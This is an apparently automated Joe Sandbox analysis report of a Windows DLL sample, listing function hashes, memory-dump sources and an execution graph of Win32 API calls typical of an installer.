                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __except_validate_context_record
                                                                                                                              • String ID: csm$csm
                                                                                                                              • API String ID: 1467352782-3733052814
                                                                                                                              • Opcode ID: 11f095e9a7a103b2dffaaad5c002ec31548d68615d4ecd38f1e3540bd0063fdd
                                                                                                                              • Instruction ID: 558cede2ebbe3d469d6b3d16083a3f3e01edada5d9eacf7d7859ac3ed49e1089
                                                                                                                              • Opcode Fuzzy Hash: 11f095e9a7a103b2dffaaad5c002ec31548d68615d4ecd38f1e3540bd0063fdd
                                                                                                                              • Instruction Fuzzy Hash: 8671C072A1868186DF618B29D4907BD7BA0EB04BC8F148135DB5D47AD9CB3CF593CB18
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8056AD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                              • String ID: csm
                                                                                                                              • API String ID: 2558813199-1018135373
                                                                                                                              • Opcode ID: 5a644383df360f8a72950bdd64a5e86df78d61a4470b2bfe1f4e930e4838c79e
                                                                                                                              • Instruction ID: 57ea79b7daa8ca78e6723e6903dfef06e1d726ea36fc377208128403aacc11e2
                                                                                                                              • Opcode Fuzzy Hash: 5a644383df360f8a72950bdd64a5e86df78d61a4470b2bfe1f4e930e4838c79e
                                                                                                                              • Instruction Fuzzy Hash: 2D517F76A19B4286EA60EF19F4812AE77B4F788BD0F101134DB8D07B95CF38E462CB15
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B805F5F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                              • String ID: U
                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                              • Opcode ID: 2c59e69480dbff0ce1ef26930cfb33cc319c9dc92910ae3c01e55a8558c84cd1
                                                                                                                              • Instruction ID: d014647a0c58707ea0da3493c87287b7ea90e0efea4f78f226b4ccabdd313d15
                                                                                                                              • Opcode Fuzzy Hash: 2c59e69480dbff0ce1ef26930cfb33cc319c9dc92910ae3c01e55a8558c84cd1
                                                                                                                              • Instruction Fuzzy Hash: 0941A222B19A4586EB10CF29E4843AA67A1FB987C4F454031EF4D87794DF7CE443C754
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8053E94 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8B805111F), ref: 00007FF8B8053EE4
                                                                                                                              • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8B805111F), ref: 00007FF8B8053F25
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                              • String ID: csm
                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                              • Opcode ID: 846e25402a60aca5edca3f1187c6fb768a747376de963512183b6fccce3bac3b
                                                                                                                              • Instruction ID: c7ed060d078acec0325a0976f6d7b09f9d8622d9be413301778c4751d7037412
                                                                                                                              • Opcode Fuzzy Hash: 846e25402a60aca5edca3f1187c6fb768a747376de963512183b6fccce3bac3b
                                                                                                                              • Instruction Fuzzy Hash: A4111C32618B8282EB618B19E44026A77E5FB89BD4F594234DB8D07B94DF7CD552CB04
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:31.4%
                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                              Signature Coverage:14.1%
                                                                                                                              Total number of Nodes:1351
                                                                                                                              Total number of Limit Nodes:41
                                                                                                                              execution_graph 2914 4015c1 2933 402d3e 2914->2933 2918 401631 2920 401663 2918->2920 2921 401636 2918->2921 2924 401423 24 API calls 2920->2924 2957 401423 2921->2957 2931 40165b 2924->2931 2928 40164a SetCurrentDirectoryW 2928->2931 2929 4015d1 2929->2918 2930 401617 GetFileAttributesW 2929->2930 2945 405d13 2929->2945 2949 4059e2 2929->2949 2952 405948 CreateDirectoryW 2929->2952 2961 4059c5 CreateDirectoryW 2929->2961 2930->2929 2934 402d4a 2933->2934 2964 40644e 2934->2964 2937 4015c8 2939 405d91 CharNextW CharNextW 2937->2939 2940 405dae 2939->2940 2943 405dc0 2939->2943 2942 405dbb CharNextW 2940->2942 2940->2943 2941 405de4 2941->2929 2942->2941 2943->2941 2944 405d13 CharNextW 2943->2944 2944->2943 2946 405d19 2945->2946 2947 405d2f 2946->2947 2948 405d20 CharNextW 2946->2948 2947->2929 2948->2946 3002 406806 GetModuleHandleA 2949->3002 2953 405995 2952->2953 2954 405999 GetLastError 2952->2954 2953->2929 2954->2953 2955 4059a8 SetFileSecurityW 2954->2955 2955->2953 2956 4059be GetLastError 2955->2956 2956->2953 3011 405479 2957->3011 2960 406411 lstrcpynW 2960->2928 2962 4059d9 GetLastError 2961->2962 2963 4059d5 2961->2963 2962->2963 2963->2929 2972 40645b 2964->2972 2965 4066a6 2966 402d6b 2965->2966 2997 406411 lstrcpynW 2965->2997 2966->2937 2981 4066c0 2966->2981 2968 406674 lstrlenW 2968->2972 2969 40644e 10 API calls 2969->2968 2972->2965 2972->2968 2972->2969 2974 406589 GetSystemDirectoryW 2972->2974 2975 40659c GetWindowsDirectoryW 2972->2975 2976 4066c0 5 API calls 2972->2976 2977 40644e 10 API calls 2972->2977 2978 406617 lstrcatW 2972->2978 2979 4065d0 SHGetSpecialFolderLocation 2972->2979 2990 4062df 2972->2990 2995 406358 wsprintfW 2972->2995 2996 406411 lstrcpynW 2972->2996 2974->2972 2975->2972 2976->2972 2977->2972 2978->2972 2979->2972 2980 4065e8 SHGetPathFromIDListW CoTaskMemFree 2979->2980 2980->2972 2988 4066cd 2981->2988 2982 406743 2983 406748 CharPrevW 2982->2983 2985 406769 2982->2985 2983->2982 2984 406736 CharNextW 2984->2982 2984->2988 2985->2937 2986 405d13 CharNextW 2986->2988 2987 406722 CharNextW 2987->2988 2988->2982 2988->2984 2988->2986 2988->2987 2989 406731 CharNextW 2988->2989 2989->2984 2998 40627e 2990->2998 2993 406313 RegQueryValueExW RegCloseKey 2994 406343 2993->2994 2994->2972 2995->2972 2996->2972 2997->2966 2999 40628d 2998->2999 3000 406291 2999->3000 3001 406296 RegOpenKeyExW 2999->3001 3000->2993 3000->2994 3001->3000 3003 406822 3002->3003 3004 40682c GetProcAddress 3002->3004 3008 406796 GetSystemDirectoryW 3003->3008 3006 4059e9 3004->3006 3006->2929 3007 406828 3007->3004 3007->3006 3009 4067b8 wsprintfW LoadLibraryExW 3008->3009 3009->3007 3012 405494 3011->3012 3021 401431 3011->3021 3013 4054b0 lstrlenW 3012->3013 3014 40644e 17 API calls 3012->3014 3015 4054d9 3013->3015 3016 4054be lstrlenW 3013->3016 3014->3013 3018 4054ec 3015->3018 3019 4054df SetWindowTextW 3015->3019 3017 4054d0 lstrcatW 3016->3017 3016->3021 3017->3015 3020 4054f2 SendMessageW SendMessageW SendMessageW 3018->3020 3018->3021 3019->3018 3020->3021 3021->2960 3022 401941 3023 401943 3022->3023 3024 402d3e 17 API calls 3023->3024 3025 401948 3024->3025 3028 405b23 3025->3028 3064 405dee 3028->3064 3031 405b62 3034 405c82 3031->3034 3078 406411 lstrcpynW 3031->3078 3032 405b4b DeleteFileW 3061 401951 3032->3061 3034->3061 3096 40676f FindFirstFileW 3034->3096 3035 405b88 3036 405b9b 3035->3036 3037 405b8e lstrcatW 3035->3037 3079 405d32 lstrlenW 3036->3079 3038 405ba1 3037->3038 3041 405bb1 lstrcatW 3038->3041 3043 405bbc lstrlenW FindFirstFileW 3038->3043 3041->3043 3043->3034 3051 405bde 3043->3051 3046 405c65 FindNextFileW 3049 405c7b FindClose 3046->3049 3046->3051 3047 405adb 5 API calls 3050 405cbd 3047->3050 3049->3034 3052 405cc1 3050->3052 3053 405cd7 3050->3053 3051->3046 3057 405b23 60 API calls 3051->3057 3060 405479 24 API calls 3051->3060 3062 405479 24 API calls 3051->3062 3083 406411 lstrcpynW 3051->3083 3084 405adb 3051->3084 3092 4061d7 MoveFileExW 3051->3092 3056 405479 24 API calls 3052->3056 3052->3061 3055 405479 24 API calls 3053->3055 3055->3061 3058 405cce 3056->3058 3057->3051 3059 4061d7 36 API calls 3058->3059 3059->3061 3060->3046 3062->3051 3102 406411 lstrcpynW 3064->3102 3066 405dff 3067 405d91 4 API calls 3066->3067 3068 405e05 3067->3068 3069 405b43 3068->3069 3070 4066c0 5 API calls 3068->3070 3069->3031 3069->3032 3076 405e15 3070->3076 3071 405e46 lstrlenW 3072 405e51 3071->3072 3071->3076 3073 405ce6 3 API calls 3072->3073 3075 405e56 GetFileAttributesW 3073->3075 3074 40676f 2 API calls 3074->3076 3075->3069 3076->3069 3076->3071 3076->3074 3077 405d32 2 API calls 3076->3077 3077->3071 3078->3035 3080 405d40 3079->3080 3081 405d52 3080->3081 3082 405d46 CharPrevW 3080->3082 3081->3038 3082->3080 3082->3081 3083->3051 3103 405ee2 GetFileAttributesW 3084->3103 3087 405af6 RemoveDirectoryW 3089 405b04 3087->3089 3088 405afe DeleteFileW 3088->3089 3090 405b08 3089->3090 3091 405b14 SetFileAttributesW 3089->3091 3090->3051 3091->3090 3093 4061f8 3092->3093 3094 4061eb 3092->3094 3093->3051 3106 40605d 3094->3106 3097 405ca7 3096->3097 3098 406785 FindClose 3096->3098 3097->3061 3099 405ce6 lstrlenW CharPrevW 3097->3099 3098->3097 3100 405d02 lstrcatW 3099->3100 3101 405cb1 3099->3101 3100->3101 3101->3047 3102->3066 3104 405ae7 3103->3104 3105 405ef4 SetFileAttributesW 3103->3105 3104->3087 3104->3088 3104->3090 3105->3104 3107 4060b3 GetShortPathNameW 3106->3107 3108 40608d 3106->3108 3110 4061d2 3107->3110 3111 4060c8 3107->3111 3133 405f07 GetFileAttributesW CreateFileW 3108->3133 3110->3093 3111->3110 3113 4060d0 wsprintfA 3111->3113 3112 406097 CloseHandle GetShortPathNameW 3112->3110 3114 4060ab 3112->3114 3115 40644e 17 API calls 3113->3115 3114->3107 3114->3110 3116 4060f8 3115->3116 3134 405f07 GetFileAttributesW CreateFileW 3116->3134 3118 406105 3118->3110 3119 406114 GetFileSize GlobalAlloc 3118->3119 3120 406136 3119->3120 3121 4061cb CloseHandle 3119->3121 3135 405f8a ReadFile 3120->3135 3121->3110 3126 406155 lstrcpyA 3128 406177 3126->3128 3127 406169 3129 405e6c 4 API calls 3127->3129 3130 4061ae SetFilePointer 3128->3130 3129->3128 3142 405fb9 WriteFile 3130->3142 3133->3112 3134->3118 3136 405fa8 3135->3136 3136->3121 3137 405e6c lstrlenA 3136->3137 3138 405ead lstrlenA 3137->3138 3139 405eb5 3138->3139 3140 405e86 lstrcmpiA 3138->3140 3139->3126 3139->3127 3140->3139 3141 405ea4 CharNextA 3140->3141 3141->3138 3143 405fd7 GlobalFree 3142->3143 3143->3121 3229 401c43 3230 402d1c 17 API calls 3229->3230 3231 401c4a 3230->3231 3232 402d1c 17 API calls 3231->3232 3233 401c57 3232->3233 3234 401c6c 3233->3234 3235 402d3e 17 API calls 3233->3235 3236 401c7c 3234->3236 3239 402d3e 17 API calls 3234->3239 3235->3234 3237 401cd3 3236->3237 3238 401c87 3236->3238 3241 402d3e 17 API calls 3237->3241 3240 402d1c 17 API calls 3238->3240 3239->3236 3242 401c8c 3240->3242 3243 401cd8 3241->3243 3244 402d1c 17 API calls 3242->3244 3245 402d3e 17 API calls 3243->3245 3246 401c98 3244->3246 3247 401ce1 FindWindowExW 3245->3247 3248 401cc3 SendMessageW 3246->3248 3249 401ca5 SendMessageTimeoutW 3246->3249 3250 401d03 3247->3250 3248->3250 3249->3250 3921 402b43 3922 406806 5 API calls 3921->3922 3923 402b4a 3922->3923 3924 402d3e 17 API calls 3923->3924 3925 402b53 3924->3925 3926 402b57 IIDFromString 3925->3926 3927 402b8e 3925->3927 3926->3927 3928 402b66 3926->3928 3928->3927 3931 406411 lstrcpynW 3928->3931 3930 402b83 CoTaskMemFree 3930->3927 3931->3930 3279 4034c5 SetErrorMode GetVersion 3280 403504 3279->3280 3281 40350a 3279->3281 3282 406806 5 API calls 3280->3282 3283 406796 3 API calls 3281->3283 3282->3281 3284 403520 lstrlenA 3283->3284 3284->3281 3285 403530 3284->3285 3286 406806 5 API calls 3285->3286 3287 403537 3286->3287 3288 406806 5 API calls 3287->3288 3289 40353e 3288->3289 3290 406806 5 API calls 3289->3290 3291 40354a #17 OleInitialize SHGetFileInfoW 3290->3291 3369 406411 lstrcpynW 3291->3369 3294 403596 GetCommandLineW 3370 406411 lstrcpynW 3294->3370 3296 4035a8 3297 405d13 CharNextW 3296->3297 3298 4035cd CharNextW 3297->3298 3299 4036f7 GetTempPathW 3298->3299 3307 4035e6 3298->3307 3371 403494 3299->3371 3301 40370f 3302 403713 GetWindowsDirectoryW lstrcatW 3301->3302 3303 403769 DeleteFileW 3301->3303 3304 403494 12 API calls 3302->3304 3381 403015 GetTickCount GetModuleFileNameW 3303->3381 3308 40372f 3304->3308 3305 405d13 CharNextW 3305->3307 3307->3305 3314 4036e2 3307->3314 3316 4036e0 3307->3316 3308->3303 3310 403733 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3308->3310 3309 40377d 3311 403834 ExitProcess OleUninitialize 3309->3311 3322 405d13 CharNextW 3309->3322 3353 403820 3309->3353 3315 403494 12 API calls 3310->3315 3312 40396a 3311->3312 3313 40384a 3311->3313 3318 403972 GetCurrentProcess OpenProcessToken 3312->3318 3319 4039ee ExitProcess 3312->3319 3468 405a77 3313->3468 3465 406411 lstrcpynW 3314->3465 3320 403761 3315->3320 3316->3299 3327 40398a LookupPrivilegeValueW AdjustTokenPrivileges 3318->3327 3328 4039be 3318->3328 3320->3303 3320->3311 3329 40379c 3322->3329 3324 403830 3324->3311 3327->3328 3330 406806 5 API calls 3328->3330 3331 403860 3329->3331 3332 4037fa 3329->3332 3336 4039c5 3330->3336 3333 4059e2 5 API calls 3331->3333 3334 405dee 18 API calls 3332->3334 3338 403865 lstrcatW 3333->3338 3339 403806 3334->3339 3335 4039da ExitWindowsEx 3335->3319 3337 4039e7 3335->3337 3336->3335 3336->3337 3474 40140b 3337->3474 3341 403881 lstrcatW lstrcmpiW 3338->3341 3342 403876 lstrcatW 3338->3342 3339->3311 3466 406411 lstrcpynW 3339->3466 3341->3311 3343 40389d 3341->3343 3342->3341 3345 4038a2 3343->3345 3346 4038a9 3343->3346 3348 405948 4 API calls 3345->3348 3350 4059c5 2 API calls 3346->3350 3347 403815 3467 406411 lstrcpynW 3347->3467 3352 4038a7 3348->3352 3351 4038ae SetCurrentDirectoryW 3350->3351 3354 4038c9 3351->3354 3355 4038be 3351->3355 3352->3351 3409 403ae0 3353->3409 3473 406411 lstrcpynW 3354->3473 3472 406411 lstrcpynW 3355->3472 3358 40644e 17 API calls 3359 403908 DeleteFileW 3358->3359 3360 403915 CopyFileW 3359->3360 3366 4038d7 3359->3366 3360->3366 3361 40395e 3362 4061d7 36 API calls 3361->3362 3364 403965 3362->3364 3363 4061d7 36 API calls 3363->3366 3364->3311 3365 40644e 17 API calls 3365->3366 3366->3358 3366->3361 3366->3363 3366->3365 3367 4059fa 2 API calls 3366->3367 3368 403949 CloseHandle 3366->3368 3367->3366 3368->3366 3369->3294 3370->3296 3372 4066c0 5 API calls 3371->3372 3374 4034a0 3372->3374 3373 4034aa 3373->3301 3374->3373 3375 405ce6 3 API calls 3374->3375 3376 4034b2 3375->3376 3377 4059c5 2 API calls 3376->3377 3378 4034b8 3377->3378 3477 405f36 3378->3477 3481 405f07 GetFileAttributesW CreateFileW 3381->3481 3383 403055 3401 403065 3383->3401 3482 406411 lstrcpynW 3383->3482 3385 40307b 3386 405d32 2 API calls 3385->3386 3387 403081 3386->3387 3483 406411 lstrcpynW 3387->3483 3389 40308c GetFileSize 3394 4030a3 3389->3394 3406 403186 3389->3406 3391 40318f 3393 4031bf GlobalAlloc 3391->3393 3391->3401 3496 40347d SetFilePointer 3391->3496 3392 403467 ReadFile 3392->3394 3495 40347d SetFilePointer 3393->3495 3394->3392 3396 4031f2 3394->3396 3394->3401 3405 402fb1 6 API calls 3394->3405 3394->3406 3398 402fb1 6 API calls 3396->3398 3398->3401 3399 4031a8 3402 403467 ReadFile 3399->3402 3400 4031da 3403 40324c 31 API calls 3400->3403 3401->3309 3404 4031b3 3402->3404 3407 4031e6 3403->3407 3404->3393 3404->3401 3405->3394 3484 402fb1 3406->3484 3407->3401 3408 403223 SetFilePointer 3407->3408 3408->3401 3410 406806 5 API calls 3409->3410 3411 403af4 3410->3411 3412 403afa 3411->3412 3413 403b0c 3411->3413 3512 406358 wsprintfW 3412->3512 3414 4062df 3 API calls 3413->3414 3415 403b3c 3414->3415 3417 403b5b lstrcatW 3415->3417 3418 4062df 3 API calls 3415->3418 3419 403b0a 3417->3419 3418->3417 3497 403db6 3419->3497 3422 405dee 18 API calls 3423 403b8d 3422->3423 3424 403c21 3423->3424 3426 4062df 3 API calls 3423->3426 3425 405dee 18 API calls 3424->3425 3427 403c27 3425->3427 3428 403bbf 3426->3428 3429 403c37 LoadImageW 3427->3429 3430 40644e 17 API calls 3427->3430 3428->3424 3435 403be0 lstrlenW 3428->3435 3439 405d13 CharNextW 3428->3439 3431 403cdd 3429->3431 3432 403c5e RegisterClassW 3429->3432 3430->3429 3434 40140b 2 API calls 3431->3434 3433 403c94 SystemParametersInfoW CreateWindowExW 3432->3433 3464 403ce7 3432->3464 3433->3431 3438 403ce3 3434->3438 3436 403c14 3435->3436 3437 403bee lstrcmpiW 3435->3437 3441 405ce6 3 API calls 3436->3441 3437->3436 3440 403bfe GetFileAttributesW 3437->3440 3444 403db6 18 API calls 3438->3444 3438->3464 3442 403bdd 3439->3442 3443 403c0a 3440->3443 3445 403c1a 3441->3445 3442->3435 3443->3436 3446 405d32 2 API calls 3443->3446 3447 403cf4 3444->3447 3513 406411 lstrcpynW 3445->3513 3446->3436 3449 403d00 ShowWindow 3447->3449 3450 403d83 3447->3450 3452 406796 3 API calls 3449->3452 3505 40554c OleInitialize 3450->3505 3454 403d18 3452->3454 3453 403d89 3455 403da5 3453->3455 3456 403d8d 3453->3456 3457 403d26 GetClassInfoW 3454->3457 3459 406796 3 API calls 3454->3459 3458 40140b 2 API calls 3455->3458 3463 40140b 2 API calls 3456->3463 3456->3464 3460 403d50 DialogBoxParamW 3457->3460 3461 403d3a GetClassInfoW RegisterClassW 3457->3461 3458->3464 3459->3457 3462 40140b 2 API calls 3460->3462 3461->3460 3462->3464 3463->3464 3464->3324 3465->3316 3466->3347 3467->3353 3471 405a8c 3468->3471 3469 403858 ExitProcess 3470 405aa0 MessageBoxIndirectW 3470->3469 3471->3469 3471->3470 3472->3354 3473->3366 3475 401389 2 API calls 3474->3475 3476 401420 3475->3476 3476->3319 3478 405f43 GetTickCount GetTempFileNameW 3477->3478 3479 4034c3 3478->3479 3480 405f79 3478->3480 3479->3301 3480->3478 3480->3479 3481->3383 3482->3385 3483->3389 3485 402fd2 3484->3485 3486 402fba 3484->3486 3489 402fe2 GetTickCount 3485->3489 3490 402fda 3485->3490 3487 402fc3 DestroyWindow 3486->3487 3488 402fca 3486->3488 3487->3488 3488->3391 3492 402ff0 CreateDialogParamW ShowWindow 3489->3492 3493 403013 3489->3493 3491 406842 2 API calls 3490->3491 3494 402fe0 3491->3494 3492->3493 3493->3391 3494->3391 3495->3400 3496->3399 3498 403dca 3497->3498 3514 406358 wsprintfW 3498->3514 3500 403e3b 3515 403e6f 3500->3515 3502 403b6b 3502->3422 3503 403e40 3503->3502 3504 40644e 17 API calls 3503->3504 3504->3503 3518 4043b3 3505->3518 3507 405596 3508 4043b3 SendMessageW 3507->3508 3510 4055a8 OleUninitialize 3508->3510 3509 40556f 3509->3507 3521 401389 3509->3521 3510->3453 3512->3419 3513->3424 3514->3500 3516 40644e 17 API calls 3515->3516 3517 403e7d SetWindowTextW 3516->3517 3517->3503 3519 4043cb 3518->3519 3520 4043bc SendMessageW 3518->3520 3519->3509 3520->3519 3523 401390 3521->3523 3522 4013fe 3522->3509 3523->3522 3524 4013cb MulDiv SendMessageW 3523->3524 3524->3523 3536 402947 3537 402d3e 17 API calls 3536->3537 3538 402955 3537->3538 3539 40296b 3538->3539 3540 402d3e 17 API calls 3538->3540 3541 405ee2 2 API calls 3539->3541 3540->3539 3542 402971 3541->3542 3564 405f07 GetFileAttributesW CreateFileW 3542->3564 3544 40297e 3545 402a21 3544->3545 3546 40298a GlobalAlloc 3544->3546 3547 402a29 DeleteFileW 3545->3547 3548 402a3c 3545->3548 3549 4029a3 3546->3549 3550 402a18 CloseHandle 3546->3550 3547->3548 3565 40347d SetFilePointer 3549->3565 3550->3545 3552 4029a9 3553 403467 ReadFile 3552->3553 3554 4029b2 GlobalAlloc 3553->3554 3555 4029c2 3554->3555 3556 4029f6 3554->3556 3557 40324c 31 API calls 3555->3557 3558 405fb9 WriteFile 3556->3558 3563 4029cf 3557->3563 3559 402a02 GlobalFree 3558->3559 3560 40324c 31 API calls 3559->3560 3562 402a15 3560->3562 3561 4029ed GlobalFree 3561->3556 3562->3550 3563->3561 3564->3544 3565->3552 3576 4014cb 3577 405479 24 API calls 3576->3577 3578 4014d2 3577->3578 3932 4016cc 3933 402d3e 17 API calls 3932->3933 3934 4016d2 GetFullPathNameW 3933->3934 3935 4016ec 3934->3935 3941 40170e 3934->3941 3938 40676f 2 API calls 3935->3938 3935->3941 3936 402bc2 3937 401723 GetShortPathNameW 3937->3936 3939 4016fe 3938->3939 3939->3941 3942 406411 lstrcpynW 3939->3942 3941->3936 3941->3937 3942->3941 3943 401e4e GetDC 3944 402d1c 17 API calls 3943->3944 3945 401e60 GetDeviceCaps MulDiv ReleaseDC 3944->3945 3946 402d1c 17 API calls 3945->3946 3947 401e91 3946->3947 3948 40644e 17 API calls 3947->3948 3949 401ece CreateFontIndirectW 3948->3949 3950 402630 3949->3950 3951 402acf 3952 402d1c 17 API calls 3951->3952 3953 402ad5 3952->3953 3954 402b12 3953->3954 3956 402925 3953->3956 3957 402ae7 3953->3957 3955 40644e 17 API calls 3954->3955 3954->3956 3955->3956 3957->3956 3959 406358 wsprintfW 3957->3959 3959->3956 3719 4020d0 3720 4020e2 3719->3720 3729 402194 3719->3729 3721 402d3e 17 API calls 3720->3721 3723 4020e9 3721->3723 3722 401423 24 API calls 3730 4022ee 3722->3730 3724 402d3e 17 API calls 3723->3724 3725 4020f2 3724->3725 3726 402108 LoadLibraryExW 3725->3726 3727 4020fa GetModuleHandleW 3725->3727 3728 402119 3726->3728 3726->3729 3727->3726 3727->3728 3739 406875 3728->3739 3729->3722 3733 402163 3735 405479 24 API calls 3733->3735 3734 40212a 3736 401423 24 API calls 3734->3736 3737 40213a 3734->3737 3735->3737 3736->3737 3737->3730 3738 402186 FreeLibrary 3737->3738 3738->3730 3744 406433 WideCharToMultiByte 3739->3744 3741 406892 3742 406899 GetProcAddress 3741->3742 3743 402124 3741->3743 3742->3743 3743->3733 3743->3734 3744->3741 3960 404dd4 GetDlgItem GetDlgItem 3961 404e28 7 API calls 3960->3961 3975 405052 3960->3975 3962 404ed2 DeleteObject 3961->3962 3963 404ec5 SendMessageW 3961->3963 3964 404edd 3962->3964 3963->3962 3966 404f14 3964->3966 3968 40644e 17 API calls 3964->3968 3965 40513a 3967 4051e3 3965->3967 3971 405045 3965->3971 3977 405190 SendMessageW 3965->3977 3969 404367 18 API calls 3966->3969 3972 4051f8 3967->3972 3973 4051ec SendMessageW 3967->3973 3974 404ef6 SendMessageW SendMessageW 3968->3974 3970 404f28 3969->3970 3976 404367 18 API calls 3970->3976 3979 4043ce 8 API calls 3971->3979 3984 405211 3972->3984 3985 40520a ImageList_Destroy 3972->3985 3990 405221 3972->3990 3973->3972 3974->3964 3975->3965 3989 4050c4 3975->3989 4014 404d22 SendMessageW 3975->4014 3993 404f39 3976->3993 3977->3971 3982 4051a5 SendMessageW 3977->3982 3978 40512c SendMessageW 3978->3965 3983 4053e6 3979->3983 3981 40539a 3981->3971 3991 4053ac ShowWindow GetDlgItem ShowWindow 3981->3991 3988 4051b8 3982->3988 3986 40521a GlobalFree 3984->3986 3984->3990 3985->3984 3986->3990 3987 405014 GetWindowLongW SetWindowLongW 3992 40502d 3987->3992 3998 4051c9 SendMessageW 3988->3998 3989->3965 3989->3978 3990->3981 4007 40525c 3990->4007 4019 404da2 3990->4019 3991->3971 3994 405032 ShowWindow 3992->3994 3995 40504a 3992->3995 3993->3987 3997 404f8c SendMessageW 3993->3997 3999 40500f 3993->3999 4001 404fca SendMessageW 3993->4001 4002 404fde SendMessageW 3993->4002 4012 40439c SendMessageW 3994->4012 4013 40439c SendMessageW 3995->4013 3997->3993 3998->3967 3999->3987 3999->3992 4001->3993 4002->3993 4004 405366 4005 405370 InvalidateRect 4004->4005 4008 40537c 4004->4008 4005->4008 4006 40528a SendMessageW 4011 4052a0 4006->4011 4007->4006 4007->4011 4008->3981 4009 404cdd 20 API calls 4008->4009 4009->3981 4010 405314 SendMessageW SendMessageW 4010->4011 4011->4004 4011->4010 4012->3971 4013->3975 4015 404d81 SendMessageW 4014->4015 4016 404d45 GetMessagePos ScreenToClient SendMessageW 4014->4016 4017 404d79 4015->4017 4016->4017 4018 404d7e 4016->4018 4017->3989 4018->4015 4028 406411 lstrcpynW 4019->4028 4021 404db5 4029 406358 wsprintfW 4021->4029 4023 404dbf 4024 40140b 2 API calls 4023->4024 4025 404dc8 4024->4025 4030 406411 lstrcpynW 4025->4030 4027 404dcf 4027->4007 4028->4021 4029->4023 